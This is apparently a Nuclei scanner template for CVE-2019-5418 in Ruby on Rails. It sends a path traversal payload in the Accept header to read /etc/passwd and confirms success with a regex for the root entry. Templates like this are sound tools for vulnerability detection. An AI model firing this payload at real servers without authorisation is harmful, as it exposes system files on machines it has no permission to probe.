id: cve-2019-5418 info: name: File Content Disclosure on Rails author: omarkurt severity: medium # reference: https://github.com/omarkurt/CVE-2019-5418 requests: - method: GET path: - "{{BaseURL}}" headers: Accept: ../../../../../../../../etc/passwd{{ matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:" part: body